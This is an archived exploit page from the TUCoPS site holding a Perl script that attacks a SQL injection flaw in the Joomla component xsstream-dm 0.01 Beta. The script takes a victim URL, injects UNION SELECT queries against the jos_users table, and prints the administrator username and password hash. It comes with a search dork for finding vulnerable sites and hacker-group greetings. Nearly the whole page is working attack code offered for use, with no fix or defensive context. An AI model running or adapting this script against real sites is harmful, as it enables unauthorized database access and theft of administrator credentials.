TUCoPS :: Web :: CMS / Portals :: bx3134.htm

Joomla Component xsstream-dm 0.01 Beta SQL Injection
Joomla Component xsstream-dm 0.01 Beta SQL Injection
Joomla Component xsstream-dm 0.01 Beta SQL Injection


#!/usr/bin/perl -w=0D
=0D
#########################################################=0D
#     Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection	#=0D
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24=0D 
#########################################################=0D
=0D
########################################=0D
#[*] Founded by : Houssamix From H-T Team =0D
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo=0D
#[*] Dork inurl:"index.php?option=com_xsstream-dm"=0D
#[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs  :) =0D
=0D
########################################=0D
#[*] Script_Name: "Joomla"=0D
#[*] Component_Name: "xsstream-dm" 0.01 Beta=0D
########################################=0D
=0D
=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#                        Viva Islam                    #\n\n";=0D
print "\t\t########################################################\n\n";=0D
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection  #\n\n";=0D
print "\t\t#           by Houssamix & Stack-Terrorist             #\n\n";=0D
print "\t\t#              from H-T Team & v4 Team                 #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
use LWP::UserAgent;=0D
die "Example: perl $0 http://victim.com/\n" unless @ARGV;=0D 
#the username of joomla =0D
$user="username";=0D
#the pasword of joomla =0D
$pass="password";=0D
#the tables of joomla =0D
$tab="jos_users";=0D
#the the union of joomla =0D
$un="/**/union/**/select/**/";=0D
#the vulnerable compenent  =0D
$com="com_xsstream-dm&Itemid";=0D
# Lets star exploiting =0D
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";=0D
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');=0D
=0D
$host = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$user.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";=0D
=0D
$res = $b->request(HTTP::Request->new(GET=>$host));=0D
$answer = $res->content;=0D
=0D
if ($answer =~ /
(.*?)<\/div>/){=0D
        =0D
        print "\n[+] Admin User : $1";=0D
}=0D
$host2 = $ARGV[0] . "/index.php?option=".$com."=69&movie=-1".$un."1,2,".$pass.",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/".$tab."/**";=0D
=0D
$res2 = $b->request(HTTP::Request->new(GET=>$host2));=0D
$answer = $res2->content;=0D
=0D
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";=0D
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";=0D
}=0D
=0D
else{print "\n[-] Exploit Failed...\n";}=0D
=0D
=0D
=0D
#exploit discovered by Houssamix From H-T Team=0D
# exploit exploited by Stack-Terrorist =0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH